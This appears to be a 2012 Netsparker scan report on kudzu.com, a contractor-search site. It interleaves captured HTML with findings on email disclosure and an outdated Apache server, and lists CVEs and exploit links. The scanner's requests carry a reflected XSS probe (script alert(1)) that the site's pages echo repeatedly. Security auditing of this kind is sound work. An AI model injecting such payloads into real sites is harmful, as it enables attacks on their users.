<tr>
<td align="left" style="padding:0px 3px 0px 0px">
<div class="navtext navtext-findapro">Find a Pro:<br /></div>
</td>
<td align="left" valign="middle">
<div id="testtest_search">
<input type='text' id='searchterms' name='searchterms' value="plumber electrician" style='width:190px;font-size:14px;padding:6px;border:1px solid #999999' size='40' onblur='onSuggestionFocusLost(this)' onkeydown='onSuggestionKeyDown(this, event)' onkeyup='onSuggestionKeyUp(this, event, 4, getDataUrl_searchterms())' autocomplete='off' /><br /><div id='searchterms_suggest' class='autoComplete' ></div><script type='text/javascript' language='javascript'>function searchterms_onServerResponse() {if(req.readyState!=4) { return; }if(req.status != 200) {return;}var responseData = req.responseText;var curControl = document.getElementById('searchterms');var responseData = req.responseText;var dataValues=eval('(' + responseData + ')');populateSuggestionList(curControl, dataValues);}function getDataUrl_searchterms() {var curControl = document.getElementById('searchterms');var dataUrl = '/JQueryJsonAutoCompleteData?format=json&chosenLocationZip=10012&criteria=' + curControl.value + '&maxCount=10&providerClass=com.coxsearch.autocomplete.bll.SearchValueProvider';return dataUrl;}</script>
</div>
</td>
<td align="left" style="padding:0px 3px 0px 5px">
<div class="navtext navtext-closeto">Close to:<br /></div>
</td>
<td align="left" valign="middle" nowrap>
<div id="locations">
<input name="location" id="currentLocation" type="text" class="searchBox" style="width:190px;font-size:14px;padding:6px;border:1px solid #999999" value="New York, NY 10012" />
<a href="javascript:void(0);" onClick="setLocsDiv();"><img name="downButton" id="downButton" src="/img/btn_saved.gif" border="0" align="top" style="margin-top:5px;margin-left:1px" onload="setMouse()"></a>
</div>
<div style="position:relative;z-index:30">
<div name="locsDiv" id="locsDiv" style="visibility:hidden;position:absolute;z-index:1000;top:2px;background-color:#FFFFFF;border-top:1px solid #555555;border-left:1px solid #555555;border-right:2px solid #444444;border-bottom:2px solid #333333">
<div style="padding:5px">
<table cellpadding="0" cellspacing="0" width="100%">
<tr>
<td><span class="heading" style="font-weight:bold; font-size:11px;">Recent Searches:</span><br />
<div id="recentContent" style="display:none;position:relative;z-index:1010;"><iframe id= "recentframe" src="/my_recentLocationsList.jsp" width="180" height="100" scrolling="no" frameborder="0" name="content"></iframe></div><div id="noContent" style="display:none;">No recent locations</div>
</td>
<td valign="top" align="right"><img src="/img/map/cls.gif" onClick="hide_savedLocs()"></td>
</tr>
<tr>
<td height="3" colspan="2"></td>
</tr>
<tr>
<td colspan="2">
<br />
<a href="javascript:void()" onClick="return resetCookie();">Clear recent searches</a><br />
</td>
</tr>
<tr>
<td colspan="2" height="5"></td>
</tr>
<tr>
<td colspan="2" width="100%"><table width="100%" cellpadding="0" cellspacing="0" bgcolor="#999999"><tr><td width="100%" bgcolor="#999999"><img src="/img/spacer.gif"></td></tr></table></td>
</tr>
<tr>
<td colspan="2" height="5"></td>
</tr>
<tr>
<td><span class="heading" style="font-weight:bold; font-size:11px;">Your Saved Locations:</span><br>
<div id="iframe" style="display:none;position:relative;z-index:1005;"><a href="/myLocationsAction.do">Please log in to use Saved Locations</a></div></td>
<td valign="top" align="right"></td>
</tr>

<tr>
<td height="3" colspan="2"></td>
</tr>
<tr>
<td colspan="2"><a href="/myLocationsAction.do">Add/Edit saved locations</a><br /></td>
</tr>
</table>
</div></div></div></td>
<td valign="middle" align="left" nowrap="nowrap" style="padding-top:2px;padding-right:10px">
<input type="submit" value="" name="submit" border="0" align="absmiddle" class="navtext navtext-search" />
</td>
<td nowrap align="left" valign="middle">

<iframe id="kadr88x31" src="/DoubleClickFrame.jsp?adType=HEADER_88X31&bucket=plumber electrician&adify=false&cafemom=false&hgtvad=false" width="88" height="31" frameborder="0" scrolling="no" marginheight="0" marginwidth="0" allowtransparency="true"></iframe>
</td>
</tr>
<tr>
<td colspan="3">
</td>
<td align="left">
<div id="locationStatus" style="color: red;"></div>
</td>
</tr>
</table>
</form>
</div>
</td>
</tr>
</table>


<script>
$(document).ready(function() {
});
</script>



<!-- No image available for request!!! Is bucket turned on for the market?-->





<!-- loginErrorMessages.jsp -->


<!-- end loginErrorMessages.jsp -->
<table cellpadding="0" cellspacing="0" border="0" width="1000" style="text-align:left">
<tr>
<td class="refine" colspan="2"><img src="http://images.kudzu.com/img/misc/txt_refine.gif" alt="Refine" /><br /></td>
<td colspan="3" align="left" style="font-size:14px">

Displaying results <b>1 - 15</b> of <b>148</b> for
<!-- ProfileMark -->
<h1 class="results">New York plumber electrician</h1>
</td>
</tr>
<tr>
<!-- ExcludeProfileMark -->
<td rowspan="2" valign="top" align="left" class="leftBox">
<table cellpadding="0" cellspacing="0" border="0" width="180">
<tr>
<td valign="top" style="padding-left:10px;padding-bottom:10px">
<div class="showResults" style="margin-bottom:10px">
<div class="box4"><div class="box3"><div class="box2"><div class="box1">
<div style="padding-bottom:5px;" class="txtHeader">Show results within</div>
&nbsp;&nbsp;<select name="distance" onChange="self.location=this.options[this.selectedIndex].value" style="font-size:10px;font-family:Verdana, Helvetica, sans-serif; ">

<option value="/controller.jsp?searchVal=plumber%20electrician&currentLocation=new%20york%20city&searchType=keyword&Ns=P_PremiumPlacementce97c%22%3E%3Cscript%3Ealert%281%29%3C/script%3Ecf1e0696b9a&N=0&distFilter=160.93470878864446">
<center>
100
</center>
</option>


<option value="/controller.jsp?searchVal=plumber%20electrician&currentLocation=new%20york%20city&searchType=keyword&Ns=P_PremiumPlacementce97c%22%3E%3Cscript%3Ealert%281%29%3C/script%3Ecf1e0696b9a&N=0&distFilter=80.46735439432223" selected>

<center>
50
</center>
</option>

<option value="/controller.jsp?searchVal=plumber%20electrician&currentLocation=new%20york%20city&searchType=keyword&Ns=P_PremiumPlacementce97c%22%3E%3Cscript%3Ealert%281%29%3C/script%3Ecf1e0696b9a&N=0&distFilter=40.233677197161114">

<center>
25
</center>
</option>

<option value="/controller.jsp?searchVal=plumber%20electrician&currentLocation=new%20york%20city&searchType=keyword&Ns=P_PremiumPlacementce97c%22%3E%3Cscript%3Ealert%281%29%3C/script%3Ecf1e0696b9a&N=0&distFilter=16.093470878864444">

<center>
E-mail Address Disclosure

E-mail Address Disclosure

1 TOTAL
INFORMATION
Netsparker found e-mail addresses on the web site.

Impact

E-mail addresses discovered within the application can be used by both spam email engines and also brute force tools. Furthermore valid email addresses may lead to social engineering attacks .

Remedy

Use generic email addresses such as contact@ or info@ for general communications, remove user/people specific e-mail addresses from the web site, should this be required use submission forms for this purpose.

External References

Classification

OWASP A6 PCI v1.2-6.5.6 WASC-13
- /controller.jsp

/controller.jsp

http://www.kudzu.com/controller.jsp?N=0&searchVal=plumber%20electrician&currentLocation=new%20york%2..

Found E-mails

www.FatherAndSonHomeBuilders.cominfo@FatherAndSonHomeBuilders.com

Request

GET /controller.jsp?N=0&searchVal=plumber%20electrician¤tLocation=new%20york%20city&searchType=keyword&Ns=P_PremiumPlacementce97c%22%3E%3Cscript%3Ealert%281%29%3C/script%3Ecf1e0696b9a HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)
Cache-Control: no-cache
Host: www.kudzu.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Thu, 19 Jan 2012 13:25:36 GMT
Server: Apache/2.0.63 (Unix) DAV/2 mod_ssl/2.0.63 OpenSSL/0.9.8e mod_jk/1.2.26
Set-Cookie: logs=174.36.218.2.1326979536100593; path=/; expires=Sun, 14-Jul-24 13:25:36 GMT,JSESSIONID=1BD5B5BEC068570C97291D70570FCCA4.coxsearchtc1; Path=/,locations="ZZZStreet=&ZZZCity=New York&ZZZState=NY&ZZZZip=10012&ZZZLatitude=40.720409&ZZZLongitude=-73.994637&ZZZName=New+York%2C+NY++10012&ZZZDefault=false&ZZZCookieVersion=1.0|"; Domain=kudzu.com; Expires=Fri, 18-Jan-2013 13:25:36 GMT; Path=/,RECENT_SEARCH=plumber+electrician&New+York%2C+NY+10012; Domain=www.kudzu.com; Expires=Fri, 18-Jan-2013 13:25:36 GMT; Path=/
Cache-Control: no-cache,max-age=0
Expires: 0
Pragma: No-cache
Keep-Alive: timeout=10, max=500
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html

























<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>


<!-- google_ad_section_start -->
<title>plumber electrician in New York, NY - Kudzu.com</title>
<meta name="description" content="Looking for plumber electrician in New York, NY? Get reviews, maps & directions and more for New York, NY plumber electrician on Kudzu.com.">
<meta name="keywords" content="New York NY plumber electrician, New York NY plumber electrician reviews, Best plumber electrician in New York NY, plumber electrician locations">
<!-- google_ad_section_end -->
<meta name="ROBOTS" content="NOINDEX">
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<link href="/css/style.css?2" rel="stylesheet" type="text/css">
<link href="/css/results.css?2" rel="stylesheet" type="text/css">

<script language="JavaScript" src="/javascript/searchUtil.js"></script>
<script language="JavaScript">
function recordOmnitureEvent( companyid ) {
<!-- OnClickProfileMark-->
}

function getMoreFBReviews() {
document.getElementById('clickForMore').innerHTML = '<span style="color:gray">loading...&nbsp;&nbsp;</span>';
FacebookFriendReviews.getFriendsAndReviews( 10012, 2039, 8, loadMoreFBReviews );
}

function getFBFriendReviews() {
FacebookFriendReviews.getFriendsAndReviews( 10012, 2039, 3, createFBReviewsBox );
}


function facebookLoad() {
document.getElementById('fbReviewsDefault').style.display = 'none';
document.getElementById('fbReviewsBox').style.display = 'block';
getFBFriendReviews();
}

</script>
</head>


<body>


<input type="hidden" id="keyword" value="plumber electrician"/>
<input type="hidden" id="zip" value="10012"/>






























<script type='text/javascript' src='/dwr/engine.js'></script>
<script type='text/javascript' src='/dwr/util.js'></script>
<script type='text/javascript' src="/javascript/jquery/jquery-1.3.2.min.js"></script>
<script type='text/javascript' src="/javascript/jquery/qs.js"></script>
<script type='text/javascript' src='/dwr/interface/ValidateSearchParameters.js'></script>

<script>
var thirdParty = false;
</script>



<link href="/css/autoComplete.css?2" rel="stylesheet" type="text/css" />
<script type="text/javascript" src="/javascript/autocomplete/autocomplete.js"></script>


<script type="text/javascript" src="/javascript/searchScript.js"></script>
<script type="text/javascript" src="/javascript/navigation.js"></script>
<script language="javascript" src="/javascript/popup.js"></script>

<div align="center" class="bgImage">
<div id="container">
<div style="background:#fff">
<table cellpadding="0" cellspacing="0" border="0" width="100%">
<tr>
<td align="left" valign="middle" style="padding:5px 10px">

<iframe src="/userBar.jsp" id="userbar" height="18" width="700" scrolling="no" frameborder="0" marginheight="0" marginwidth="0"></iframe>

</td>
<td align="right" valign="middle" style="padding:5px 10px">
<a href="http://www.hgtv.com/"><img src="/img/txt_hgtvdiy.gif" border="0" /></a><br />
</td>
</tr>
<tr>
<td colspan="2" background="/img/topshadow.png"><img src="/img/spacer.gif" width="1" height="4" /><br /></td>
</tr>
</table>
</div>
<table cellpadding="0" cellspacing="0" border="0" class="topBg" width="100%">
<tr>
<td align="left" valign="top" style="width:197px;padding-top:3px">
<a href="/"><img src="/img/logo_header.jpg" border="0" /></a><br />
</td>
<td align="right" valign="top" style="padding-top:26px;padding-right:5px;width:803px">
<div style="min-height:90px">
<div class="ad728x90"><table align="center" cellpadding="0" cellspacing="0" border="0"><tr><td valign="top"><div><script language="JavaScript" type="text/JavaScript"> <!--ord=Math.random()*10000000000000000;document.write('<SCR' + 'IPT LANGUAGE="JavaScript1.1" SRC="http://ad.doubleclick.net/adj/kudzu.cox/cafemom;industry=cafemom;tn=1;tcs=0;tcp=0;to=h;tbw=0;te=1;s_word=cafemom;sz=728x90;ord='+ord+'?"></SCR' + 'IPT>'); //--></script></div></td></tr></table></div>
</div>
<div style="text-align:left;padding-top:27px;padding-right:5px;z-index:10">
<script language="javascript" src="/content/includes_kudzu/javascript/navigation.js"></script>
</div>
</td>
</tr>
<tr>
<td colspan="2" align="center" style="padding:25px 0px">
<div>
<form action="Javascript:Search()" name="search_terms_form">
<input name="searchBy" id="searchBy" type="hidden" value="keyword" />
<table cellspacing="0" cellpadding="0" border="0" style="width:825px">
<tr>
<td align="left" style="padding:0px 3px 0px 0px">
<div class="navtext navtext-findapro">Find a Pro:<br /></div>
</td>
<td align="left" valign="middle">
<div id="testtest_search">
<input type='text' id='searchterms' name='searchterms' value="plumber electrician" style='width:190px;font-size:14px;padding:6px;border:1px solid #999999' size='40' onblur='onSuggestionFocusLost(this)' onkeydown='onSuggestionKeyDown(this, event)' onkeyup='onSuggestionKeyUp(this, event, 4, getDataUrl_searchterms())' autocomplete='off' /><br /><div id='searchterms_suggest' class='autoComplete' ></div><script type='text/javascript' language='javascript'>function searchterms_onServerResponse() {if(req.readyState!=4) { return; }if(req.status != 200) {return;}var responseData = req.responseText;var curControl = document.getElementById('searchterms');var responseData = req.responseText;var dataValues=eval('(' + responseData + ')');populateSuggestionList(curControl, dataValues);}function getDataUrl_searchterms() {var curControl = document.getElementById('searchterms');var dataUrl = '/JQueryJsonAutoCompleteData?format=json&chosenLocationZip=10012&criteria=' + curControl.value + '&maxCount=10&providerClass=com.coxsearch.autocomplete.bll.SearchValueProvider';return dataUrl;}</script>
</div>
</td>
<td align="left" style="padding:0px 3px 0px 5px">
<div class="navtext navtext-closeto">Close to:<br /></div>
</td>
<td align="left" valign="middle" nowrap>
<div id="locations">
<input name="location" id="currentLocation" type="text" class="searchBox" style="width:190px;font-size:14px;padding:6px;border:1px solid #999999" value="New York, NY 10012" />
<a href="javascript:void(0);" onClick="setLocsDiv();"><img name="downButton" id="downButton" src="/img/btn_saved.gif" border="0" align="top" style="margin-top:5px;margin-left:1px" onload="setMouse()"></a>
</div>
<div style="position:relative;z-index:30">
<div name="locsDiv" id="locsDiv" style="visibility:hidden;position:absolute;z-index:1000;top:2px;background-color:#FFFFFF;border-top:1px solid #555555;border-left:1px solid #555555;border-right:2px solid #444444;border-bottom:2px solid #333333">
<div style="padding:5px">
<table cellpadding="0" cellspacing="0" width="100%">
<tr>
<td><span class="heading" style="font-weight:bold; font-size:11px;">Recent Searches:</span><br />
<div id="recentContent" style="display:none;position:relative;z-index:1010;"><iframe id= "recentframe" src="/my_recentLocationsList.jsp" width="180" height="100" scrolling="no" frameborder="0" name="content"></iframe></div><div id="noContent" style="display:none;">No recent locations</div>
</td>
<td valign="top" align="right"><img src="/img/map/cls.gif" onClick="hide_savedLocs()"></td>
</tr>
<tr>
<td height="3" colspan="2"></td>
</tr>
<tr>
<td colspan="2">
<br />
<a href="javascript:void()" onClick="return resetCookie();">Clear recent searches</a><br />
</td>
</tr>
<tr>
<td colspan="2" height="5"></td>
</tr>
<tr>
<td colspan="2" width="100%"><table width="100%" cellpadding="0" cellspacing="0" bgcolor="#999999"><tr><td width="100%" bgcolor="#999999"><img src="/img/spacer.gif"></td></tr></table></td>
</tr>
<tr>
<td colspan="2" height="5"></td>
</tr>
<tr>
<td><span class="heading" style="font-weight:bold; font-size:11px;">Your Saved Locations:</span><br>
<div id="iframe" style="display:none;position:relative;z-index:1005;"><a href="/myLocationsAction.do">Please log in to use Saved Locations</a></div></td>
<td valign="top" align="right"></td>
</tr>

<tr>
<td height="3" colspan="2"></td>
</tr>
<tr>
<td colspan="2"><a href="/myLocationsAction.do">Add/Edit saved locations</a><br /></td>
</tr>
</table>
</div></div></div></td>
<td valign="middle" align="left" nowrap="nowrap" style="padding-top:2px;padding-right:10px">
<input type="submit" value="" name="submit" border="0" align="absmiddle" class="navtext navtext-search" />
</td>
<td nowrap align="left" valign="middle">

<iframe id="kadr88x31" src="/DoubleClickFrame.jsp?adType=HEADER_88X31&bucket=plumber electrician&adify=false&cafemom=false&hgtvad=false" width="88" height="31" frameborder="0" scrolling="no" marginheight="0" marginwidth="0" allowtransparency="true"></iframe>
</td>
</tr>
<tr>
<td colspan="3">
</td>
<td align="left">
<div id="locationStatus" style="color: red;"></div>
</td>
</tr>
</table>
</form>
</div>
</td>
</tr>
</table>


<script>
$(document).ready(function() {
});
</script>



<!-- No image available for request!!! Is bucket turned on for the market?-->





<!-- loginErrorMessages.jsp -->


<!-- end loginErrorMessages.jsp -->
<table cellpadding="0" cellspacing="0" border="0" width="1000" style="text-align:left">
<tr>
<td class="refine" colspan="2"><img src="http://images.kudzu.com/img/misc/txt_refine.gif" alt="Refine" /><br /></td>
<td colspan="3" align="left" style="font-size:14px">

Displaying results <b>1 - 15</b> of <b>148</b> for
<!-- ProfileMark -->
<h1 class="results">New York plumber electrician</h1>
</td>
</tr>
<tr>
<!-- ExcludeProfileMark -->
<td rowspan="2" valign="top" align="left" class="leftBox">
<table cellpadding="0" cellspacing="0" border="0" width="180">
<tr>
<td valign="top" style="padding-left:10px;padding-bottom:10px">
<div class="showResults" style="margin-bottom:10px">
<div class="box4"><div class="box3"><div class="box2"><div class="box1">
<div style="padding-bottom:5px;" class="txtHeader">Show results within</div>
&nbsp;&nbsp;<select name="distance" onChange="self.location=this.options[this.selectedIndex].value" style="font-size:10px;font-family:Verdana, Helvetica, sans-serif; ">

<option value="/controller.jsp?searchVal=plumber%20electrician&currentLocation=new%20york%20city&searchType=keyword&Ns=P_PremiumPlacementce97c%22%3E%3Cscript%3Ealert%281%29%3C/script%3Ecf1e0696b9a&N=0&distFilter=160.93470878864446">
<center>
100
</center>
</option>


<option value="/controller.jsp?searchVal=plumber%20electrician&currentLocation=new%20york%20city&searchType=keyword&Ns=P_PremiumPlacementce97c%22%3E%3Cscript%3Ealert%281%29%3C/script%3Ecf1e0696b9a&N=0&distFilter=80.46735439432223" selected>

<center>
50
</center>
</option>

<option value="/controller.jsp?searchVal=plumber%20electrician&currentLocation=new%20york%20city&searchType=keyword&Ns=P_PremiumPlacementce97c%22%3E%3Cscript%3Ealert%281%29%3C/script%3Ecf1e0696b9a&N=0&distFilter=40.233677197161114">

<center>
25
</center>
</option>

<option value="/controller.jsp?searchVal=plumber%20electrician&currentLocation=new%20york%20city&searchType=keyword&Ns=P_PremiumPlacementce97c%22%3E%3Cscript%3Ealert%281%29%3C/script%3Ecf1e0696b9a&N=0&distFilter=16.093470878864444">

<center>
Apache Version Is Out Of Date

Apache Version Is Out Of Date

1 TOTAL
INFORMATION
Netsparker identified that the target web server's Apache server and it is out of date. This was disclosed through the HTTP response.

Remedy

Please upgrade your installation of Apache to the latest stable version.

Remedy References

Known Vulnerabilities in this Version

Apache mod_isapi Memory Corruption Vulnerability

modules/arch/win32/mod_isapi.c in mod_isapi in the Apache HTTP Server when running on Windows, does not ensure that request processing is complete before calling isapi_unload for an ISAPI .dll module, which allows remote attackers to execute arbitrary code via unspecified vectors related to a crafted request, a reset packet, and "orphaned callback pointers."

External References

CVE-2010-0425

Exploit

http://www.securityfocus.com/bid/38494/exploit; http://www.metasploit.com/modules/auxiliary/dos/http/apache_mod_isapi

Apache APR-util 'apr_brigade_split_line()' Denial of Service Vulnerability

Memory leak in the apr_brigade_split_line function in buckets/apr_brigade.c in the Apache Portable Runtime Utility library (aka APR-util), as used in the mod_reqtimeout module in the Apache HTTP Server and other software, allows remote attackers to cause a denial of service (memory consumption) via unspecified vectors related to the destruction of an APR bucket.

External References

CVE-2010-1623

Apache mod_cache and mod_dav Request Handling Denial of Service Vulnerability

The mod_cache and mod_dav modules in the Apache HTTP Server allow remote attackers to cause a denial of service (process crash) via a request that lacks a path.

External References

CVE-2010-1452

Apache APR and APR-util Multiple Integer Overflow Vulnerabilities

Multiple integer overflows in the Apache Portable Runtime (APR) library and the Apache Portable Utility library (aka APR-util) 0.9.x and 1.3.x allow remote attackers to cause a denial of service (application crash) or possibly execute arbitrary code via vectors that trigger crafted calls to the allocator_alloc or apr_palloc function in memory/unix/apr_pools.c in APR; or crafted calls to the apr_rmm_malloc, apr_rmm_calloc, or apr_rmm_realloc function in misc/apr_rmm.c in APR-util; leading to buffer overflows.

External References

CVE-2009-2412

Apache HTTP Server mod_deflate Denial of Service Vulnerability

The mod_deflate module in Apache HTTP Server compresses large files until completion even after the associated network connection is closed, which allows remote attackers to cause a denial of service (CPU consumption).

External References

CVE-2009-1891

Apache mod_proxy_ftp Remote Command Injection Vulnerability

The mod_proxy_ftp module in the Apache HTTP Server allows remote attackers to bypass intended access restrictions and send arbitrary commands to an FTP server via vectors related to the embedding of these commands in the Authorization HTTP header.

External References

CVE-2009-3095

Apache mod_proxy_ftp Module Insufficient Input Validation Denial Of Service Vulnerability

The ap_proxy_ftp_handler function in modules/proxy/proxy_ftp.c in the mod_proxy_ftp module in the Apache HTTP Server allows remote FTP servers to cause a denial of service (NULL pointer dereference and child process crash) via a malformed reply to an EPSV command.

External References

CVE-2009-3094

Apache mod_proxy_ftp Wildcard Characters Cross-Site Scripting Vulnerability

Cross-site scripting (XSS) vulnerability in proxy_ftp.c in the mod_proxy_ftp module in Apache and earlier, and mod_proxy_ftp.c in the mod_proxy_ftp module in Apache, allows remote attackers to inject arbitrary web script or HTML via a wildcard in the last directory component in the pathname in an FTP URI.

External References

CVE-2008-2939

Apache mod_proxy_http Interim Response Denial of Service Vulnerability

The ap_proxy_http_process_response function in mod_proxy_http.c in the mod_proxy module in the Apache HTTP Server does not limit the number of forwarded interim responses, which allows remote HTTP servers to cause a denial of service (memory consumption) via a large number of interim responses.

External References

CVE-2008-2364

- /controller.jsp

/controller.jsp

http://www.kudzu.com/controller.jsp?N=0&searchVal=plumber%20electrician&currentLocation=new%20york%2..

Version

2.0.63

Request

GET /controller.jsp?N=0&searchVal=plumber%20electrician¤tLocation=new%20york%20city&searchType=keyword&Ns=P_PremiumPlacementce97c%22%3E%3Cscript%3Ealert%281%29%3C/script%3Ecf1e0696b9a HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)
Cache-Control: no-cache
Host: www.kudzu.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Thu, 19 Jan 2012 13:25:36 GMT
Server: Apache/2.0.63 (Unix) DAV/2 mod_ssl/2.0.63 OpenSSL/0.9.8e mod_jk/1.2.26
Set-Cookie: logs=174.36.218.2.1326979536100593; path=/; expires=Sun, 14-Jul-24 13:25:36 GMT,JSESSIONID=1BD5B5BEC068570C97291D70570FCCA4.coxsearchtc1; Path=/,locations="ZZZStreet=&ZZZCity=New York&ZZZState=NY&ZZZZip=10012&ZZZLatitude=40.720409&ZZZLongitude=-73.994637&ZZZName=New+York%2C+NY++10012&ZZZDefault=false&ZZZCookieVersion=1.0|"; Domain=kudzu.com; Expires=Fri, 18-Jan-2013 13:25:36 GMT; Path=/,RECENT_SEARCH=plumber+electrician&New+York%2C+NY+10012; Domain=www.kudzu.com; Expires=Fri, 18-Jan-2013 13:25:36 GMT; Path=/
Cache-Control: no-cache,max-age=0
Expires: 0
Pragma: No-cache
Keep-Alive: timeout=10, max=500
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html

























<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>


<!-- google_ad_section_start -->
<title>plumber electrician in New York, NY - Kudzu.com</title>
<meta name="description" content="Looking for plumber electrician in New York, NY? Get reviews, maps & directions and more for New York, NY plumber electrician on Kudzu.com.">
<meta name="keywords" content="New York NY plumber electrician, New York NY plumber electrician reviews, Best plumber electrician in New York NY, plumber electrician locations">
<!-- google_ad_section_end -->
<meta name="ROBOTS" content="NOINDEX">
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<link href="/css/style.css?2" rel="stylesheet" type="text/css">
<link href="/css/results.css?2" rel="stylesheet" type="text/css">

<script language="JavaScript" src="/javascript/searchUtil.js"></script>
<script language="JavaScript">
function recordOmnitureEvent( companyid ) {
<!-- OnClickProfileMark-->
}

function getMoreFBReviews() {
document.getElementById('clickForMore').innerHTML = '<span style="color:gray">loading...&nbsp;&nbsp;</span>';
FacebookFriendReviews.getFriendsAndReviews( 10012, 2039, 8, loadMoreFBReviews );
}

function getFBFriendReviews() {
FacebookFriendReviews.getFriendsAndReviews( 10012, 2039, 3, createFBReviewsBox );
}


function facebookLoad() {
document.getElementById('fbReviewsDefault').style.display = 'none';
document.getElementById('fbReviewsBox').style.display = 'block';
getFBFriendReviews();
}

</script>
</head>


<body>


<input type="hidden" id="keyword" value="plumber electrician"/>
<input type="hidden" id="zip" value="10012"/>






























<script type='text/javascript' src='/dwr/engine.js'></script>
<script type='text/javascript' src='/dwr/util.js'></script>
<script type='text/javascript' src="/javascript/jquery/jquery-1.3.2.min.js"></script>
<script type='text/javascript' src="/javascript/jquery/qs.js"></script>
<script type='text/javascript' src='/dwr/interface/ValidateSearchParameters.js'></script>

<script>
var thirdParty = false;
</script>



<link href="/css/autoComplete.css?2" rel="stylesheet" type="text/css" />
<script type="text/javascript" src="/javascript/autocomplete/autocomplete.js"></script>


<script type="text/javascript" src="/javascript/searchScript.js"></script>
<script type="text/javascript" src="/javascript/navigation.js"></script>
<script language="javascript" src="/javascript/popup.js"></script>

<div align="center" class="bgImage">
<div id="container">
<div style="background:#fff">
<table cellpadding="0" cellspacing="0" border="0" width="100%">
<tr>
<td align="left" valign="middle" style="padding:5px 10px">

<iframe src="/userBar.jsp" id="userbar" height="18" width="700" scrolling="no" frameborder="0" marginheight="0" marginwidth="0"></iframe>

</td>
<td align="right" valign="middle" style="padding:5px 10px">
<a href="http://www.hgtv.com/"><img src="/img/txt_hgtvdiy.gif" border="0" /></a><br />
</td>
</tr>
<tr>
<td colspan="2" background="/img/topshadow.png"><img src="/img/spacer.gif" width="1" height="4" /><br /></td>
</tr>
</table>
</div>
<table cellpadding="0" cellspacing="0" border="0" class="topBg" width="100%">
<tr>
<td align="left" valign="top" style="width:197px;padding-top:3px">
<a href="/"><img src="/img/logo_header.jpg" border="0" /></a><br />
</td>
<td align="right" valign="top" style="padding-top:26px;padding-right:5px;width:803px">
<div style="min-height:90px">
<div class="ad728x90"><table align="center" cellpadding="0" cellspacing="0" border="0"><tr><td valign="top"><div><script language="JavaScript" type="text/JavaScript"> <!--ord=Math.random()*10000000000000000;document.write('<SCR' + 'IPT LANGUAGE="JavaScript1.1" SRC="http://ad.doubleclick.net/adj/kudzu.cox/cafemom;industry=cafemom;tn=1;tcs=0;tcp=0;to=h;tbw=0;te=1;s_word=cafemom;sz=728x90;ord='+ord+'?"></SCR' + 'IPT>'); //--></script></div></td></tr></table></div>
</div>
<div style="text-align:left;padding-top:27px;padding-right:5px;z-index:10">
<script language="javascript" src="/content/includes_kudzu/javascript/navigation.js"></script>
</div>
</td>
</tr>
<tr>
<td colspan="2" align="center" style="padding:25px 0px">
<div>
<form action="Javascript:Search()" name="search_terms_form">
<input name="searchBy" id="searchBy" type="hidden" value="keyword" />
<table cellspacing="0" cellpadding="0" border="0" style="width:825px">
<tr>
<td align="left" style="padding:0px 3px 0px 0px">
<div class="navtext navtext-findapro">Find a Pro:<br /></div>
</td>
<td align="left" valign="middle">
<div id="testtest_search">
<input type='text' id='searchterms' name='searchterms' value="plumber electrician" style='width:190px;font-size:14px;padding:6px;border:1px solid #999999' size='40' onblur='onSuggestionFocusLost(this)' onkeydown='onSuggestionKeyDown(this, event)' onkeyup='onSuggestionKeyUp(this, event, 4, getDataUrl_searchterms())' autocomplete='off' /><br /><div id='searchterms_suggest' class='autoComplete' ></div><script type='text/javascript' language='javascript'>function searchterms_onServerResponse() {if(req.readyState!=4) { return; }if(req.status != 200) {return;}var responseData = req.responseText;var curControl = document.getElementById('searchterms');var responseData = req.responseText;var dataValues=eval('(' + responseData + ')');populateSuggestionList(curControl, dataValues);}function getDataUrl_searchterms() {var curControl = document.getElementById('searchterms');var dataUrl = '/JQueryJsonAutoCompleteData?format=json&chosenLocationZip=10012&criteria=' + curControl.value + '&maxCount=10&providerClass=com.coxsearch.autocomplete.bll.SearchValueProvider';return dataUrl;}</script>
</div>
</td>
<td align="left" style="padding:0px 3px 0px 5px">
<div class="navtext navtext-closeto">Close to:<br /></div>
</td>
<td align="left" valign="middle" nowrap>
<div id="locations">
<input name="location" id="currentLocation" type="text" class="searchBox" style="width:190px;font-size:14px;padding:6px;border:1px solid #999999" value="New York, NY 10012" />
<a href="javascript:void(0);" onClick="setLocsDiv();"><img name="downButton" id="downButton" src="/img/btn_saved.gif" border="0" align="top" style="margin-top:5px;margin-left:1px" onload="setMouse()"></a>
</div>
<div style="position:relative;z-index:30">
<div name="locsDiv" id="locsDiv" style="visibility:hidden;position:absolute;z-index:1000;top:2px;background-color:#FFFFFF;border-top:1px solid #555555;border-left:1px solid #555555;border-right:2px solid #444444;border-bottom:2px solid #333333">
<div style="padding:5px">
<table cellpadding="0" cellspacing="0" width="100%">
<tr>
<td><span class="heading" style="font-weight:bold; font-size:11px;">Recent Searches:</span><br />
<div id="recentContent" style="display:none;position:relative;z-index:1010;"><iframe id= "recentframe" src="/my_recentLocationsList.jsp" width="180" height="100" scrolling="no" frameborder="0" name="content"></iframe></div><div id="noContent" style="display:none;">No recent locations</div>
</td>
